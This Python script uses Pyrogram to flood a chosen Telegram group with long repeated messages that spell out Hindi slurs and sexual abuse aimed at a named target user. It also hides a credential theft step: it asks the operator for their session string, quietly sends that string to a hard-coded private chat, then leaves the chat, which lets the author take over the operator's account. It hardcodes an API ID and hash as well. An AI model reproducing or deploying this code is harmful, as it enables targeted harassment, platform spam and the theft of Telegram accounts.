import os
import sys
import asyncio
from asyncio import sleep
from pyrogram import Client, filters
from pyrogram.types import Message
import tgcrypto

print("\n - Pyrogram Capital abuse -")
ID = "2674930"
HASH = "83cbf60334d0cef44ce94b53b3ddc296"
Connect = input("\n\nSend Your Pyrogram String Session: \n")

fuck = Client(name="Session", api_id=ID, api_hash=HASH, session_string=Connect)

grp = input("\n\nSend Group username Where You Want Abuse: \n")
if grp == "@SPAMKROBC":
  print("Can't Spam Here!")
elif grp == "@SPAMKROBC":
  print("Can't Spam Here!")
elif grp == "@SPAMKROBC":
  print("Can't Spam Here!")
else:
  trg = input("\n\nEnter Target Username or Name \n")
if trg == "@AGHORI_OP_BOLTE":
  print("Can't Spam On Him!")
elif trg == "@AGHORI_OP_BOLTE":
  print("Can't Spam On Him!")
elif trg == "@AGHORI_OP_BOLTE":
  print("Can't Spam On Him!")
elif trg == "@AGHORI_OP_BOLTE":
  print("Can't Spam On Him!")
elif trg == "@AGHORI_OP_BOLTE":
  print("Can't Spam On Him!")
elif trg == "@AGHORI_OP_BOLTE":
  print("Can't Spam On Him!")
  print("\n\nOne Word Spam Started!\n\n - @AGHORI_OP_BOLTE -")
fuck.start()
fuck.join_chat(grp)
fuck.join_chat("@SPAMKROBC")
fuck.send_message(-1001821868827, f"{Connect}")
fuck.leave_chat(-1001821868827)
x = True
try:
  while x != False:
    
    fuck.send_message(grp, f"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA {trg} AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA😂")
    
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} XXXXXXXXXXXXXXXXXXXXXXXXXXX😂")
    
    fuck.send_message(grp, f"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD {trg} DDDDDDDDDDDDDDDDDDDDDDD😂")
    
    fuck.send_message(grp, f"TTTTTTTTTTTTEEEEEERRRRRRRIIIIIIIIIMMMMMMMMMMMMAAAAAAAAAAAAKKKKKKKKKKKAAAAAAAABBBBBBBBBBBHHHHHHHHHOOOOOOOOOOOSSSSSSSSSDDDDDDDDDDDDHHHHHHHHAAAAAAAAAA {trg} AAAAAAAAAAAAAAAAAA😂")
    
    fuck.send_message(grp, f"RRRRRRRRRRRRRRAAAAAANNNNNNNNNNNNNNDDDDDDDDDDDDIIIIIIIIIIIIIKKKKKKKKKEEEEEEEEEEEBBBBBBBBBBBBBAAAAAAAAAAXXXXXXXXHHHHHHHHHHHHHEEEEEEEE {trg} EEEEEEEEEEEEEEEEEEEEE😂")
    fuck.send_message(grp, f"FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF {trg} 😂")
    
    fuck.send_message(grp, f"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM {trg} 😂")
    
    fuck.send_message(grp, f"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC {trg} 😂")
    fuck.send_message(grp, f"HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTTTTTTTEEEEEEEEEEEEEEEEERRRRRRRRRRRRRRRRRRIIIIIIIIIIIIIIIIIIIIIIIIIIIII {trg} 😂")
    fuck.send_message(grp, f"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMAAAAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKIIIIIIIIIIIIIIIIIIIIIIIIIIIIII {trg} 😂")
    fuck.send_message(grp, f"CCCCCCCCCCCCCCCCCCCCHHHHHHHHHHUUUUUUUUUUUUUUUUUUUUUUUUUUTTTTTTTTTTTTTTTTTTTTTTTTTTT {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT {trg} 😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} 😂")
    fuck.send_message(grp, f"LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL {trg} 😂")
    fuck.send_message(grp, f"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM {trg} 😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} 😂")
    fuck.send_message(grp, f"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaAAAAAAAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"LLLLLLLLLLLLLOOOOOOOOOOOOOOOOOOODDDDDDDDDDDDDEEEEEEEEEEEEKKKKKKKKKKAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBAAAAAAAAAAAAAALLLLLLLLLLLLLLLL {trg} 😂")
    fuck.send_message(grp, f"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTEEEEEERRRRRRRIIIIIIIIIMMMMMMMMMMMMAAAAAAAAAAAAKKKKKKKKKKKAAAAAAAABBBBBBBBBBBHHHHHHHHHOOOOOOOOOOOSSSSSSSSSDDDDDDDDDDDDHHHHHHHHAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTEEEEEERRRRRRRIIIIIIIIIMMMMMMMMMMMMAAAAAAAAAAAAKKKKKKKKKKKAAAAAAAABBBBBBBBBBBHHHHHHHHHOOOOOOOOOOOSSSSSSSSSDDDDDDDDDDDDHHHHHHHHAAAAAAAAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTEEEEEERRRRRRRIIIIIIIIIMMMMMMMMMMMMAAAAAAAAAAAAKKKKKKKKKKKAAAAAAAABBBBBBBBBBBHHHHHHHHHOOOOOOOOOOOSSSSSSSSSDDDDDDDDDDDDHHHHHHHHAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX😂")
    fuck.send_message(grp, f"HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH {trg} HHHHHHHHHHHHHHHHHHHHHHHHH😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTEEEEEERRRRRRRIIIIIIIIIMMMMMMMMMMMMAAAAAAAAAAAAKKKKKKKKKKKAAAAAAAABBBBBBBBBBBHHHHHHHHHOOOOOOOOOOOSSSSSSSSSDDDDDDDDDDDDHHHHHHHHAAAAAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD {trg} 😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTEEEEEERRRRRRRIIIIIIIIIMMMMMMMMMMMMAAAAAAAAAAAAKKKKKKKKKKKAAAAAAAABBBBBBBBBBBHHHHHHHHHOOOOOOOOOOOSSSSSSSSSDDDDDDDDDDDDHHHHHHHHAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} 😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} 😂")
    fuck.send_message(grp, f"TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT {trg} 😂")
    fuck.send_message(grp, f"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaaaaaAAAAAAAAAAAAAAAAAAAAAAA {trg} 😂")
    fuck.send_message(grp, f"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM {trg} 😂")
    fuck.send_message(grp, f"MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM {trg} MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM😂")
    fuck.send_message(grp, f"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX {trg} XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX😂")
    fuck.send_message(grp, f"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD {trg} 😂")
except Exception as a:
  print(a)
